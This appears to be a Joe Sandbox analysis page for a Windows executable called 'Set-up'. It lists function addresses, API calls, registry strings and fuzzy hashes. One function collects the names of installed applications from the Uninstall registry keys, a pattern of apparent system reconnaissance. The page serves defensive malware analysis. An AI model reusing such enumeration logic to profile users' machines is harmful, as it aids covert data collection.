Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: 232a0fdbf67440227f36a7e64482b02f528cc8f03b52d3dbc1bc139d499c05db
Instruction ID: 509eb588e46b2a43f0223274ec13335bc79c73866847939c3ceb155d0ef29a33
Opcode Fuzzy Hash: 232a0fdbf67440227f36a7e64482b02f528cc8f03b52d3dbc1bc139d499c05db
Instruction Fuzzy Hash: E14127B0A083088FDB54EF65E98835DBBE1FB44710F05442DD945EB3A0DB749849CF81

Function 008013C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344

Part of subcall function 00B88A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,008013EF), ref: 00B88A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080140C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: 9a86179ef5dfc96cee676cf3c925c64a4b34024f62233d8abd23b48c12372648
Instruction ID: b3c480bc2c6172b376f082f407b6c62112c3728e50c94d8fbb85b2942b89865b
Opcode Fuzzy Hash: 9a86179ef5dfc96cee676cf3c925c64a4b34024f62233d8abd23b48c12372648
Instruction Fuzzy Hash: 094138B19093088FDB54EF65E98935DBBE1FB44310F10486DD985A73A1DB749849CF82

Function 00801160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 008011B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
GetStartupInfoA.KERNEL32 ref: 00801433

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 9f4c5c1b36d4e3c844f3da8fa5eb619ce1158a07fe8df7c2cb0ec8f5515bb6cd
Instruction ID: 3211adb7a03abafc40f8cab1dba531cdbefa2f2e1ebfa2773ac31cff93741eb1
Opcode Fuzzy Hash: 9f4c5c1b36d4e3c844f3da8fa5eb619ce1158a07fe8df7c2cb0ec8f5515bb6cd
Instruction Fuzzy Hash: 90517A71A047088FDB54EF65ED8975ABBE1FB48710F14452DE945EB3A0DB30A849CF81

Function 008CA8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 008CA90C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: 49e47e79600c29216ced42f76259e2dce47a1392259511c01a667ab2b08bd962
Instruction ID: 31b6f84236332e0c4a0a318b121f51848b063996d72faa14caf6ff777a1a621a
Opcode Fuzzy Hash: 49e47e79600c29216ced42f76259e2dce47a1392259511c01a667ab2b08bd962
Instruction Fuzzy Hash: 99F0497510820CAFD2109F01EC88EABBBBDFBC9758F05456DF958632118270AE14CA72

Function 008BA440 Relevance: 93.8, APIs: 43, Strings: 10, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008BAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 008BAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAB30
RegCloseKey.KERNELBASE(?), ref: 008BAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 008BAB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BABF0
RegCloseKey.ADVAPI32(?), ref: 008BAC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 008BAC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 008BAC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 008BACB4
RegCloseKey.ADVAPI32(?), ref: 008BACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 008BAD0A
RegEnumKeyExA.KERNELBASE ref: 008BAD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BADB0
RegCloseKey.KERNELBASE(?), ref: 008BADD9
RegEnumKeyExA.KERNELBASE ref: 008BAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008BAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 008BAEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008BAF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BAF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008BB027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BB03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 008BB072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 008BB0C1

Strings

[%s]:%u%%%u, xrefs: 008BA77D
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 008BAB78
SearchList, xrefs: 008BAA46, 008BAA91, 008BABA7, 008BABEA, 008BAE4E, 008BAE9D
Domain, xrefs: 008BAAE3, 008BAB2A, 008BAF5D, 008BAFAC
[%s]:%u, xrefs: 008BA845
PrimaryDNSSuffix, xrefs: 008BAC6B, 008BACAE
DhcpDomain, xrefs: 008BB06C, 008BB0BB
Software\Policies\Microsoft\System\DNSClient, xrefs: 008BAC3C
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 008BAA0F
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 008BAD00

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
API String ID: 1856363200-4239849775
Opcode ID: a3fb0e2dd2d495375d6e9154ac100f51310840e4e43d2ab1fc9a74ca53dd25c4
Instruction ID: cc7a6dc572df8bd500c93ff9c03f23d3ee9458774c6d15a77d6ff1fdab25c52e
Opcode Fuzzy Hash: a3fb0e2dd2d495375d6e9154ac100f51310840e4e43d2ab1fc9a74ca53dd25c4
Instruction Fuzzy Hash: 4182ACB1604301AFE7249B25DC85BAB7BE8FF85700F144828F985E73A1E771E949CB52

Function 008C9740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 008C978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 008C97BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008C97E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008C98A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 008C9920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008C9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 008C9974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 008C9981
RegCloseKey.ADVAPI32(?), ref: 008C998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008C9992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 008C97FE

Part of subcall function 008C78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,008CE16D,?), ref: 008C78AF
Part of subcall function 008C78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 008C78D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 008C9C46

Strings

sts, xrefs: 008C99A2
DatabasePath, xrefs: 008C996B
\hos, xrefs: 008C999A
#, xrefs: 008C9A3F
CARES_HOSTS, xrefs: 008C9788
#, xrefs: 008C9B9D
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 008C993C

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3843116398-4129964100
Opcode ID: 2a270b349bfa763ee6316b05aae3fdba9b4c7839fb34dfb970dad3280fc840e0
Instruction ID: 69f577570d2922cb1d559d44d320c7876c53bd9c41906a9f0c68655b4a8840be
Opcode Fuzzy Hash: 2a270b349bfa763ee6316b05aae3fdba9b4c7839fb34dfb970dad3280fc840e0
Instruction Fuzzy Hash: 8F3274B5904201AFEB11AB24EC46F5A76B4FF54318F08447CF98AD6362FB31E9298753

Function 00802F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00802FED
RegEnumKeyExA.KERNELBASE ref: 008031A5

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00802F49, 00802F71
index, xrefs: 00803112
%s\%s, xrefs: 00803028
app_name, xrefs: 008030F0
DisplayName, xrefs: 008030BD
d, xrefs: 00802FA0
installed_apps, xrefs: 00802F36
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00802F5D

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: EnumOpen
String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 3231578192-3120786300
Opcode ID: 874cdaa55c250da7aa20718e4c6e9be5b1bfc989aa641fbd08752a22b6597c6a
Instruction ID: fd41556093ee64b7ce3d202b332f90cdf0299d6b45f884ff76aabd36055b2e3e
Opcode Fuzzy Hash: 874cdaa55c250da7aa20718e4c6e9be5b1bfc989aa641fbd08752a22b6597c6a
Instruction Fuzzy Hash: ED71B2B49043099FDB50DF69C98479EBBF0FF85308F10899DE898A7341D7749A888F92

Function 009DE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 009DE637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0096A31E), ref: 009DE64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0096A31E,00000001,?,00000008,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000), ref: 009DE665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E), ref: 009DE6A6
GetLastError.KERNEL32(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE6CC
GetLastError.KERNEL32(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6FA

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: c755385a277f73cdbc87a7e5d1b58f04eedcfe3cb603d4f4ce8134670de57120
Instruction ID: 487f10f5fc91e473fb70215e1d82385d38341ed73891d58bfe8b79ad4d1d3bec
Opcode Fuzzy Hash: c755385a277f73cdbc87a7e5d1b58f04eedcfe3cb603d4f4ce8134670de57120
Instruction Fuzzy Hash: 4C31A179240200BFEF217F72DC49F6A3B69EB45711F148569FA129D2E0EA30DD45CBA2

Function 00838B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00838C2F
WSAGetLastError.WS2_32 ref: 00838C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00838CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00838D0E
WSAGetLastError.WS2_32 ref: 00838D18
WSASetLastError.WS2_32(00000000), ref: 00838E0C

Strings

cf-socket.c, xrefs: 00838EDF
connected, xrefs: 00838DA7
connect to %s port %u from %s port %d failed: %s, xrefs: 00838E78
local address %s port %d..., xrefs: 00838C7F
not connected yet, xrefs: 00838BDC

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: 770de739a95296e0298397fc2197638f5e2f1185a18ea822286d9d3676f8276c
Instruction ID: 0615e726ea264a51b214b52885df79218c68f3d611c46f7dd073a74428f000fe
Opcode Fuzzy Hash: 770de739a95296e0298397fc2197638f5e2f1185a18ea822286d9d3676f8276c
